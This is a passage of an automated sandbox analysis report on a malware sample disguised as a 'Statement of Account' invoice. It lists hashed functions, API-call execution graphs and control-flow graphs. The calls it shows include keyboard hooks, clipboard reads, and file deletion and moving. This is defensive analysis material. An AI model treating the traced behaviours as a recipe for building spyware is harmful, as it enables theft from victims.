                                                  • Instruction ID: fd91e99c5e8d71b93c0dda04b9b3aca850c85f39736cc32b7178be92e1e5dfb5
                                                  • Opcode Fuzzy Hash: c9a4fc970d9db436a43b8d7816f452822f8de744e9fecf277806b6eadf326574
                                                  • Instruction Fuzzy Hash: 1911CDB5C002498BDB24DF9AD844A9EFBF4AB89314F14841AD529A7210C379A545CFA1
                                                  Function 015CD3D8 Relevance: .1, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2016234186.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15cd000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d98a186d5d7b20b23ea32239b96d2c185bfa45eba1a8f578d7560c2dbdc99114
                                                  • Instruction ID: 1ec41f37b77a1990d1e9a315d357a41671082697244ce130200f53d41e605dc9
                                                  • Opcode Fuzzy Hash: d98a186d5d7b20b23ea32239b96d2c185bfa45eba1a8f578d7560c2dbdc99114
                                                  • Instruction Fuzzy Hash: F921F171100204DFDB05DF98C9C0B6ABFB5FB88714F20857DDA098E256C37AE406C6E1
                                                  Function 015CD4C4 Relevance: .1, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2016234186.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15cd000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b1dae305e91cc633c4a22e1dbe7ecd3cc1b0460c439e5edb6e804cec72766fa9
                                                  • Instruction ID: 6219c2830b98758fda56b7186a0fc5d14118875c912854783ee5872d7b81b301
                                                  • Opcode Fuzzy Hash: b1dae305e91cc633c4a22e1dbe7ecd3cc1b0460c439e5edb6e804cec72766fa9
                                                  • Instruction Fuzzy Hash: D721E071500240DFDB05DF98D9C0B2ABFB5FB98718F20857DE9098E256C33AD416CAE2
                                                  Function 015DD01C Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2016267090.00000000015DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015DD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15dd000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 298985e4b69e0ef510d93368a8c3f43a288c707a2e447aa3d0fd0616e52e9817
                                                  • Instruction ID: 241a84d5fb5eae767306f2fbbafe6543b8a04cc5b9ecc9e13141b7e49fb37162
                                                  • Opcode Fuzzy Hash: 298985e4b69e0ef510d93368a8c3f43a288c707a2e447aa3d0fd0616e52e9817
                                                  • Instruction Fuzzy Hash: B3210071604204DFCB25DF6CD980B26BFB5FB88314F20C969D90A4F296D33AD406CBA1
                                                  Function 015DD005 Relevance: .1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2016267090.00000000015DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015DD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15dd000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fcbb4407db537e072a131b90d0a7993b75b40d5ecd2861b3cf176692e8073150
                                                  • Instruction ID: 25cf9fa6699f64721e1dc6f9b20ff7014d3c4a0b2a1b9fb4fb2c4a8f468daa7b
                                                  • Opcode Fuzzy Hash: fcbb4407db537e072a131b90d0a7993b75b40d5ecd2861b3cf176692e8073150
                                                  • Instruction Fuzzy Hash: BB2183755083849FCB13CF68D994715BF71FB86214F28C5DAD8498F2A7D33A9806CB62
                                                  Function 015CD4BF Relevance: .1, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2016234186.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15cd000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                  • Instruction ID: 81bad50d29463ba13cf21e6a8e204aa1bd0531c042e4f2523b6860d510844610
                                                  • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                  • Instruction Fuzzy Hash: DD11CD76404280CFCB02CF54D9C4B1ABF71FB98614F24C6A9D9494B256C33AD45ACBA2
                                                  Function 015CD3D3 Relevance: .1, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2016234186.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_15cd000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                  • Instruction ID: 6ab952ccc636442c65e04d52a324e803330a1c82771b4ad062ea636bcb6326b4
                                                  • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                  • Instruction Fuzzy Hash: E311CD72404240DFDB02CF84D9C4B5ABF71FB84224F24C6ADDA094A256C37AE45ACBA2

                                                  Non-executed Functions

                                                  Function 0163DB1C Relevance: .3, Instructions: 264COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2017351385.0000000001630000.00000040.00000800.00020000.00000000.sdmp, Offset: 01630000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1630000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 053366ba302171f8ab81e1924f549337106d800394413db72a967a3749c70b1b
                                                  • Instruction ID: c1d87cc96b8b0ef8b5dae611889bb0d3b75228a2142c433764b2a4150da1cd4c
                                                  • Opcode Fuzzy Hash: 053366ba302171f8ab81e1924f549337106d800394413db72a967a3749c70b1b
                                                  • Instruction Fuzzy Hash: 38A17F32E002169FCF19DFB4D84459EBBB2FFC5300B1585AAE906AB265DB31E915CF80

                                                  Execution Graph

                                                  Execution Coverage:13.2%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:242
                                                  Total number of Limit Nodes:23
                                                  execution_graph 43345 6756e50 43346 6756e51 GetCurrentProcess 43345->43346 43348 6756ee1 43346->43348 43349 6756ee8 GetCurrentThread 43346->43349 43348->43349 43350 6756f25 GetCurrentProcess 43349->43350 43351 6756f1e 43349->43351 43352 6756f5b 43350->43352 43351->43350 43353 6756f83 GetCurrentThreadId 43352->43353 43354 6756fb4 43353->43354 43360 6758ae0 43361 6758aeb 43360->43361 43362 6758afb 43361->43362 43364 6756e34 43361->43364 43365 6758b30 OleInitialize 43364->43365 43367 6758b94 43365->43367 43367->43362 43368 f00848 43370 f0084e 43368->43370 43369 f0091b 43370->43369 43373 f01350 43370->43373 43387 f0147f 43370->43387 43385 f01357 43373->43385 43374 f0147a 43374->43370 43385->43374 43386 f0147f 8 API calls 43385->43386 43402 f07d81 43385->43402 43407 f07f59 43385->43407 43412 f07ebc 43385->43412 43417 f07d90 43385->43417 43422 f07efa 43385->43422 43427 67503b8 43385->43427 43435 67503c8 43385->43435 43443 f08119 43385->43443 43447 f08128 43385->43447 43451 f08829 43385->43451 43386->43385 43389 f01366 43387->43389 43390 f01483 43387->43390 43388 f0147a 43388->43370 43389->43388 43391 f08128 MoveFileA 43389->43391 43392 f08119 MoveFileA 43389->43392 43393 f0147f 8 API calls 43389->43393 43394 f08829 2 API calls 43389->43394 43395 f07d90 DeleteFileW 43389->43395 43396 f07d81 DeleteFileW 43389->43396 43397 f07f59 DeleteFileW 43389->43397 43398 f07efa DeleteFileW 43389->43398 43399 f07ebc DeleteFileW 43389->43399 43400 67503c8 4 API calls 43389->43400 43401 67503b8 4 API calls 43389->43401 43390->43370 43391->43389 43392->43389 43393->43389 43394->43389 43395->43389 43396->43389 43397->43389 43398->43389 43399->43389 43400->43389 43401->43389 43404 f07da9 43402->43404 43403 f07feb 43403->43385 43404->43403 43456 f08008 43404->43456 43460 f07ff8 43404->43460 43409 f07f5e 43407->43409 43408 f07feb 43408->43385 43410 f08008 DeleteFileW 43409->43410 43411 f07ff8 DeleteFileW 43409->43411 43410->43408 43411->43408 43414 f07ec1 43412->43414 43413 f07feb 43413->43385 43415 f08008 DeleteFileW 43414->43415 43416 f07ff8 DeleteFileW 43414->43416 43415->43413 43416->43413 43419 f07da9 43417->43419 43418 f07feb 43418->43385 43419->43418 43420 f08008 DeleteFileW 43419->43420 43421 f07ff8 DeleteFileW 43419->43421 43420->43418 43421->43418 43424 f07eff 43422->43424 43423 f07feb 43423->43385 43425 f08008 DeleteFileW 43424->43425 43426 f07ff8 DeleteFileW 43424->43426 43425->43423 43426->43423 43428 67503bc 43427->43428 43430 675048b 43428->43430 43468 6750a10 43428->43468 43473 67509d8 43428->43473 43430->43385 43436 67503da 43435->43436 43438 675048b 43436->43438 43439 6750a10 3 API calls 43436->43439 43440 67509d8 3 API calls 43436->43440 43437 6750451 43441 6758228 KiUserCallbackDispatcher 43437->43441 43442 6758218 KiUserCallbackDispatcher 43437->43442 43438->43385 43439->43437 43440->43437 43441->43438 43442->43438 43445 f08147 43443->43445 43444 f08202 43444->43385 43445->43444 43544 f07800 43445->43544 43448 f08147 43447->43448 43449 f07800 MoveFileA 43448->43449 43450 f08202 43448->43450 43449->43450 43450->43385 43453 f08833 43451->43453 43452 f088e9 43452->43385 43453->43452 43548 67bf5c8 43453->43548 43553 67bf5b8 43453->43553 43457 f08018 43456->43457 43458 f0804a 43457->43458 43464 f077d8 43457->43464 43458->43403 43461 f08018 43460->43461 43462 f077d8 DeleteFileW 43461->43462 43463 f0804a 43461->43463 43462->43463 43463->43403 43465 f08068 DeleteFileW 43464->43465 43467 f080e7 43465->43467 43467->43458 43469 6750a1d 43468->43469 43486 6751588 43469->43486 43498 6751573 43469->43498 43474 67509dd 43473->43474 43476 6751573 3 API calls 43474->43476 43477 6751588 3 API calls 43474->43477 43475 6750451 43478 6758228 43475->43478 43482 6758218 43475->43482 43476->43475 43477->43475 43479 6758230 43478->43479 43481 6758253 43479->43481 43540 6756cec 43479->43540 43481->43430 43483 6758224 43482->43483 43484 6756cec KiUserCallbackDispatcher 43483->43484 43485 6758253 43483->43485 43484->43483 43485->43430 43487 675158d 43486->43487 43510 6750994 43487->43510 43489 675161a 43496 6750994 GetModuleHandleW 43489->43496 43514 6751a58 43489->43514 43490 6751636 43493 6751662 43490->43493 43518 67509a4 43490->43518 43496->43490 43499 6751580 43498->43499 43500 6750994 GetModuleHandleW 43499->43500 43501 675161a 43500->43501 43508 6750994 GetModuleHandleW 43501->43508 43509 6751a58 GetModuleHandleW 43501->43509 43502 6751636 43503 67509a4 GetModuleHandleW 43502->43503 43505 6751662 43502->43505 43504 67516a6 43503->43504 43506 67533e1 CreateWindowExW 43504->43506 43507 67533ef CreateWindowExW 43504->43507 43506->43505 43507->43505 43508->43502 43509->43502 43511 675099f 43510->43511 43511->43489 43512 6751a73 43511->43512 43532 67520d7 43511->43532 43512->43489 43515 6751a67 43514->43515 43515->43490 43516 6751a73 43515->43516 43517 67520d7 GetModuleHandleW 43515->43517 43516->43490 43517->43516 43519 67523b0 GetModuleHandleW 43518->43519 43521 67516a6 43519->43521 43522 67533e1 43521->43522 43527 67533ef 43521->43527 43523 67533e4 43522->43523 43523->43493 43524 67533cb 43523->43524 43525 675351b CreateWindowExW 43523->43525 43524->43493 43526 675357c 43525->43526 43529 67533fc 43527->43529 43528 67533cb 43528->43493 43529->43493 43529->43528 43530 675351b CreateWindowExW 43529->43530 43531 675357c 43530->43531 43533 67520e2 43532->43533 43534 67509a4 GetModuleHandleW 43533->43534 43535 6752202 43534->43535 43536 67509a4 GetModuleHandleW 43535->43536 43539 675227c 43535->43539 43537 6752250 43536->43537 43538 67509a4 GetModuleHandleW 43537->43538 43537->43539 43538->43539 43539->43512 43541 6758268 KiUserCallbackDispatcher 43540->43541 43543 67582d6 43541->43543 43543->43479 43545 f08640 MoveFileA 43544->43545 43547 f086df 43545->43547 43547->43444 43550 67bf5dd 43548->43550 43549 67bf7f2 43549->43452 43550->43549 43551 67bf809 GlobalMemoryStatusEx GlobalMemoryStatusEx 43550->43551 43552 67bfa6c GlobalMemoryStatusEx GlobalMemoryStatusEx 43550->43552 43551->43550 43552->43550 43555 67bf5bc 43553->43555 43554 67bf7f2 43554->43452 43555->43554 43556 67bf809 GlobalMemoryStatusEx GlobalMemoryStatusEx 43555->43556 43557 67bfa6c GlobalMemoryStatusEx GlobalMemoryStatusEx 43555->43557 43556->43555 43557->43555 43558 675238c 43559 6752390 GetModuleHandleW 43558->43559 43561 6752425 43559->43561 43562 cad030 43563 cad048 43562->43563 43564 cad0a2 43563->43564 43572 6753663 43563->43572 43579 6753730 43563->43579 43587 6753600 43563->43587 43593 6753610 43563->43593 43599 6751d4c 43563->43599 43607 6751d3c 43563->43607 43611 6757c73 43563->43611 43573 6753634 43572->43573 43574 675366a 43572->43574 43575 6751d3c GetModuleHandleW 43573->43575 43574->43564 43576 6753642 43575->43576 43577 6751d4c CallWindowProcW 43576->43577 43578 6753657 43577->43578 43578->43564 43580 6753734 43579->43580 43581 675373f 43580->43581 43584 67537b9 43580->43584 43619 6751d74 43581->43619 43583 6753747 43583->43564 43585 67509a4 GetModuleHandleW 43584->43585 43586 6753817 43584->43586 43585->43586 43588 6753604 43587->43588 43589 6753642 43588->43589 43590 6751d3c GetModuleHandleW 43588->43590 43591 6751d4c CallWindowProcW 43589->43591 43590->43589 43592 6753657 43591->43592 43592->43564 43594 6753636 43593->43594 43595 6753642 43594->43595 43596 6751d3c GetModuleHandleW 43594->43596 43597 6751d4c CallWindowProcW 43595->43597 43596->43595 43598 6753657 43597->43598 43598->43564 43600 6751d57 43599->43600 43601 6757d01 43600->43601 43603 6757cf1 43600->43603 43633 6756c94 43601->43633 43625 6757e28 43603->43625 43629 6757e18 43603->43629 43604 6757cff 43604->43564 43608 6751d47 43607->43608 43609 6751d74 GetModuleHandleW 43608->43609 43610 6753747 43609->43610 43610->43564 43612 6757c7a 43611->43612 43613 6757d01 43612->43613 43615 6757cf1 43612->43615 43614 6756c94 CallWindowProcW 43613->43614 43616 6757cff 43614->43616 43617 6757e28 CallWindowProcW 43615->43617 43618 6757e18 CallWindowProcW 43615->43618 43616->43564 43617->43616 43618->43616 43620 6751d7f 43619->43620 43621 6750994 GetModuleHandleW 43620->43621 43622 67537a9 43621->43622 43623 67509a4 GetModuleHandleW 43622->43623 43624 6753817 43622->43624 43623->43624 43626 6757e2d 43625->43626 43627 6756c94 CallWindowProcW 43626->43627 43628 6757f0e 43626->43628 43627->43626 43628->43604 43631 6757e1c 43629->43631 43630 6756c94 CallWindowProcW 43630->43631 43631->43630 43632 6757f0e 43631->43632 43632->43604 43634 6756c9f 43633->43634 43635 6757fc2 CallWindowProcW 43634->43635 43636 6757f71 43634->43636 43635->43636 43636->43604 43355 6758c78 43356 6758cd2 OleGetClipboard 43355->43356 43357 6758d12 43356->43357 43358 6757098 DuplicateHandle 43359 675712e 43358->43359 43637 675a8c8 43638 675a8ce SetWindowsHookExA 43637->43638 43640 675a952 43638->43640

                                                  Executed Functions

                                                  Function 067BA910 Relevance: 10.4, Strings: 8, Instructions: 391COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 67ba910-67ba92e 2 67ba930-67ba933 0->2 3 67ba94d-67ba950 2->3 4 67ba935-67ba93e 2->4 7 67ba952-67ba95f 3->7 8 67ba964-67ba967 3->8 5 67bab47-67bab7e 4->5 6 67ba944-67ba948 4->6 15 67bab80-67bab83 5->15 6->3 7->8 9 67ba969-67ba96e 8->9 10 67ba971-67ba974 8->10 9->10 13 67ba97a-67ba97d 10->13 14 67bab2d-67bab36 10->14 16 67ba97f-67ba983 13->16 17 67ba98e-67ba991 13->17 14->4 18 67bab3c-67bab46 14->18 19 67baba6-67baba9 15->19 20 67bab85-67baba1 15->20 16->18 21 67ba989 16->21 22 67ba993-67ba9af 17->22 23 67ba9b4-67ba9b7 17->23 24 67babab-67babb5 19->24 25 67babb6-67babb9 19->25 20->19 21->17 22->23 26 67ba9b9-67ba9cc 23->26 27 67ba9d1-67ba9d4 23->27 31 67babbb call 67bae6b 25->31 32 67babc8-67babcb 25->32 26->27 28 67ba9d6-67ba9df 27->28 29 67ba9e4-67ba9e6 27->29 28->29 35 67ba9e8 29->35 36 67ba9ed-67ba9f0 29->36 43 67babc1-67babc3 31->43 37 67babd1-67bac0c 32->37 38 67bae34-67bae37 32->38 35->36 36->2 41 67ba9f6-67baa1a 36->41 49 67badff-67bae12 37->49 50 67bac12-67bac1e 37->50 39 67bae39-67bae3d 38->39 40 67bae48-67bae4a 38->40 39->37 46 67bae43 39->46 47 67bae4c 40->47 48 67bae51-67bae54 40->48 58 67bab2a 41->58 59 67baa20-67baa2f 41->59 43->32 46->40 47->48 48->15 52 67bae5a-67bae64 48->52 53 67bae14 49->53 56 67bac3e-67bac82 50->56 57 67bac20-67bac39 50->57 60 67bae15 53->60 75 67bac9e-67bacdd 56->75 76 67bac84-67bac96 56->76 57->53 58->14 63 67baa31-67baa37 59->63 64 67baa47-67baa82 call 67b61e8 59->64 60->60 66 67baa3b-67baa3d 63->66 67 67baa39 63->67 83 67baa9a-67baab1 64->83 84 67baa84-67baa8a 64->84 66->64 67->64 81 67bace3-67badbe call 67b61e8 75->81 82 67badc4-67badd9 75->82 76->75 81->82 82->49 94 67baac9-67baada 83->94 95 67baab3-67baab9 83->95 87 67baa8e-67baa90 84->87 88 67baa8c 84->88 87->83 88->83 101 67baadc-67baae2 94->101 102 67baaf2-67bab23 94->102 96 67baabb 95->96 97 67baabd-67baabf 95->97 96->94 97->94 103 67baae6-67baae8 101->103 104 67baae4 101->104 102->58 103->102 104->102
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-1273862796
                                                  • Opcode ID: 7ba502abe294b7c108dd16ad29d70447a3bd32feabec5c90ee45c72a072e94ca
                                                  • Instruction ID: f4aaa136ef88b44755c939d113fae6ecb35649f0db185f8c15d199f98b64adf1
                                                  • Opcode Fuzzy Hash: 7ba502abe294b7c108dd16ad29d70447a3bd32feabec5c90ee45c72a072e94ca
                                                  • Instruction Fuzzy Hash: 84E18E30E102098FDF68EF68D994AAEB7B6FF85304F20862AD4059B355DB35DC46CB91
                                                  Function 067B2388 Relevance: 9.0, Strings: 6, Instructions: 1497COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-3723351465
                                                  • Opcode ID: 307121632af499e581bdb72fa5fc6b54950e4f40a8f786053338f9e7ffe7115a
                                                  • Instruction ID: dd42b5836216375e0fb1b5b8b89a7e185eb3d5f51b91bdf789df27bd30d3c1c2
                                                  • Opcode Fuzzy Hash: 307121632af499e581bdb72fa5fc6b54950e4f40a8f786053338f9e7ffe7115a
                                                  • Instruction Fuzzy Hash: 4DD26930E10209CFDB64DF68C584BADB7B2FF89314F5485A9D419AB265EB34ED81CB80
                                                  Function 067B79C8 Relevance: 3.0, Strings: 2, Instructions: 477COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1564 67b79c8-67b79e6 1566 67b79e8-67b79eb 1564->1566 1567 67b79f8-67b79fb 1566->1567 1568 67b79ed-67b79f7 1566->1568 1569 67b7a1e-67b7a21 1567->1569 1570 67b79fd-67b7a19 1567->1570 1571 67b7a23-67b7a3d 1569->1571 1572 67b7a42-67b7a45 1569->1572 1570->1569 1571->1572 1573 67b7a5c-67b7a5e 1572->1573 1574 67b7a47-67b7a55 1572->1574 1576 67b7a60 1573->1576 1577 67b7a65-67b7a68 1573->1577 1580 67b7a6e-67b7a84 1574->1580 1583 67b7a57 1574->1583 1576->1577 1577->1566 1577->1580 1585 67b7a8a-67b7a93 1580->1585 1586 67b7c9f-67b7ca9 1580->1586 1583->1573 1587 67b7caa-67b7cb2 1585->1587 1588 67b7a99-67b7ab6 1585->1588 1591 67b7cba 1587->1591 1592 67b7cb4-67b7cb6 1587->1592 1598 67b7c8c-67b7c99 1588->1598 1599 67b7abc-67b7ae4 1588->1599 1596 67b7cbc-67b7cbd 1591->1596 1597 67b7cc2-67b7cc4 1591->1597 1594 67b7cb8 1592->1594 1595 67b7cbe 1592->1595 1594->1591 1600 67b7cc0-67b7cc1 1595->1600 1601 67b7cc5-67b7cdf 1595->1601 1596->1595 1597->1601 1598->1585 1598->1586 1599->1598 1616 67b7aea-67b7af3 1599->1616 1600->1597 1602 67b7ce1-67b7ce4 1601->1602 1604 67b7cea-67b7cf6 1602->1604 1605 67b7d97-67b7d9a 1602->1605 1608 67b7d01-67b7d03 1604->1608 1606 67b7da0-67b7daf 1605->1606 1607 67b7fc6-67b7fc9 1605->1607 1624 67b7dce-67b7e09 1606->1624 1625 67b7db1-67b7dcc 1606->1625 1610 67b7fcb-67b7fe7 1607->1610 1611 67b7fec-67b7fee 1607->1611 1614 67b7d1b-67b7d22 1608->1614 1615 67b7d05-67b7d0b 1608->1615 1610->1611 1612 67b7ff0 1611->1612 1613 67b7ff5-67b7ff8 1611->1613 1612->1613 1613->1602 1618 67b7ffe-67b8007 1613->1618 1621 67b7d33 1614->1621 1622 67b7d24-67b7d31 1614->1622 1619 67b7d0f-67b7d11 1615->1619 1620 67b7d0d 1615->1620 1616->1587 1623 67b7af9-67b7b15 1616->1623 1619->1614 1620->1614 1627 67b7d38-67b7d3a 1621->1627 1622->1627 1636 67b7b1b-67b7b45 1623->1636 1637 67b7c7a-67b7c86 1623->1637 1634 67b7f9a-67b7fb0 1624->1634 1635 67b7e0f-67b7e20 1624->1635 1625->1624 1629 67b7d3c-67b7d3f 1627->1629 1630 67b7d51-67b7d8a 1627->1630 1629->1618 1630->1606 1656 67b7d8c-67b7d96 1630->1656 1634->1607 1643 67b7e26-67b7e43 1635->1643 1644 67b7f85-67b7f94 1635->1644 1653 67b7b4b-67b7b73 1636->1653 1654 67b7c70-67b7c75 1636->1654 1637->1598 1637->1616 1643->1644 1657 67b7e49-67b7f3f call 67b61e8 1643->1657 1644->1634 1644->1635 1653->1654 1662 67b7b79-67b7ba7 1653->1662 1654->1637 1706 67b7f4d 1657->1706 1707 67b7f41-67b7f4b 1657->1707 1662->1654 1668 67b7bad-67b7bb6 1662->1668 1668->1654 1670 67b7bbc-67b7bee 1668->1670 1677 67b7bf9-67b7c15 1670->1677 1678 67b7bf0-67b7bf4 1670->1678 1677->1637 1680 67b7c17-67b7c6e call 67b61e8 1677->1680 1678->1654 1679 67b7bf6 1678->1679 1679->1677 1680->1637 1708 67b7f52-67b7f54 1706->1708 1707->1708 1708->1644 1709 67b7f56-67b7f5b 1708->1709 1710 67b7f69 1709->1710 1711 67b7f5d-67b7f67 1709->1711 1712 67b7f6e-67b7f70 1710->1712 1711->1712 1712->1644 1713 67b7f72-67b7f7e 1712->1713 1713->1644
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q
                                                  • API String ID: 0-127220927
                                                  • Opcode ID: 95fb2baeabff23e722de1f4e844165355024c2aeba9ffc6ae547487a2266bd76
                                                  • Instruction ID: e8b34a6d971183ccdc71df7fab17cb5bd00264bc1fa39cae4a60948c112c84cc
                                                  • Opcode Fuzzy Hash: 95fb2baeabff23e722de1f4e844165355024c2aeba9ffc6ae547487a2266bd76
                                                  • Instruction Fuzzy Hash: 63029B30B002058FDB68DF68D594BAEB7A6EFC4304F248529E409EB395DB35ED46CB81
                                                  Function 067B5930 Relevance: 2.9, Strings: 2, Instructions: 412COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1715 67b5930-67b5940 1717 67b5942-67b5945 1715->1717 1718 67b5947-67b594d 1717->1718 1719 67b5954-67b5957 1717->1719 1720 67b5959-67b5978 1718->1720 1722 67b594f 1718->1722 1719->1720 1721 67b598e-67b5991 1719->1721 1737 67b597a 1720->1737 1738 67b597d-67b5983 1720->1738 1723 67b59af-67b59b2 1721->1723 1724 67b5993-67b5998 1721->1724 1722->1719 1728 67b59bb-67b59be 1723->1728 1729 67b59b4-67b59b6 1723->1729 1726 67b599a 1724->1726 1727 67b599d-67b59aa 1724->1727 1726->1727 1727->1723 1728->1718 1730 67b59c0-67b59c3 1728->1730 1729->1728 1731 67b59ca-67b59cc 1730->1731 1732 67b59c5-67b59c7 1730->1732 1735 67b59ce 1731->1735 1736 67b59d3-67b59d6 1731->1736 1732->1731 1735->1736 1736->1717 1739 67b59dc-67b59e4 1736->1739 1737->1738 1740 67b59e5-67b59f2 1738->1740 1741 67b5985-67b5989 1738->1741 1743 67b59fa 1740->1743 1744 67b59f4 1740->1744 1741->1721 1745 67b59fc-67b59ff 1743->1745 1746 67b5a02-67b5a22 1743->1746 1744->1743 1745->1746 1747 67b5a24-67b5a27 1746->1747 1748 67b5a29-67b5a32 1747->1748 1749 67b5a35-67b5a38 1747->1749 1750 67b5a3a-67b5a41 1749->1750 1751 67b5a48-67b5a4b 1749->1751 1752 67b5a43 1750->1752 1753 67b5a51-67b5a58 1750->1753 1751->1753 1754 67b5bc5-67b5bc8 1751->1754 1752->1751 1757 67b5a5e-67b5aa5 1753->1757 1758 67b5ba6-67b5bb9 1753->1758 1755 67b5bca-67b5bd8 1754->1755 1756 67b5bdd-67b5be0 1754->1756 1755->1756 1759 67b5bfc-67b5bfe 1756->1759 1760 67b5be2-67b5bf7 1756->1760 1773 67b5aa7-67b5ab6 1757->1773 1764 67b5c00 1759->1764 1765 67b5c05-67b5c08 1759->1765 1760->1759 1764->1765 1765->1747 1767 67b5c0e-67b5c18 1765->1767 1775 67b5c1b-67b5c2e 1773->1775 1776 67b5abc-67b5ad2 1773->1776 1779 67b5c30-67b5c34 1775->1779 1780 67b5c36 1775->1780 1776->1775 1781 67b5ad8-67b5ae0 1776->1781 1779->1780 1782 67b5c38-67b5c3c 1780->1782 1783 67b5c3d-67b5c5a 1780->1783 1781->1773 1784 67b5ae2-67b5ae8 1781->1784 1782->1783 1786 67b5c5c-67b5c5f 1783->1786 1787 67b5aea-67b5aed 1784->1787 1788 67b5b48-67b5b98 call 67b4728 1784->1788 1790 67b5c72-67b5c75 1786->1790 1791 67b5c61-67b5c6d 1786->1791 1787->1775 1792 67b5af3-67b5afe 1787->1792 1838 67b5b9a 1788->1838 1839 67b5ba3 1788->1839 1794 67b5c89-67b5c8c 1790->1794 1795 67b5c77-67b5c84 1790->1795 1791->1790 1792->1775 1796 67b5b04-67b5b0e 1792->1796 1799 67b5c8e-67b5ca1 1794->1799 1800 67b5ca4-67b5ca7 1794->1800 1795->1794 1796->1775 1798 67b5b14-67b5b1e 1796->1798 1798->1775 1803 67b5b24-67b5b39 1798->1803 1804 67b5cbb-67b5cbe 1800->1804 1805 67b5ca9-67b5cb0 1800->1805 1803->1775 1810 67b5b3f-67b5b46 1803->1810 1808 67b5cd1-67b5cd4 1804->1808 1809 67b5cc0-67b5ccc 1804->1809 1806 67b5d56-67b5d5d 1805->1806 1807 67b5cb6 1805->1807 1806->1799 1815 67b5d63-67b5dce 1806->1815 1807->1804 1813 67b5cec-67b5cef 1808->1813 1814 67b5cd6-67b5ce7 1808->1814 1809->1808 1810->1787 1810->1788 1817 67b5cf1-67b5d10 1813->1817 1818 67b5d30-67b5d33 1813->1818 1814->1813 1847 67b5dd7-67b5dde 1815->1847 1836 67b5e0c-67b5e16 1817->1836 1819 67b5d4d-67b5d50 1818->1819 1820 67b5d35-67b5d48 1818->1820 1819->1806 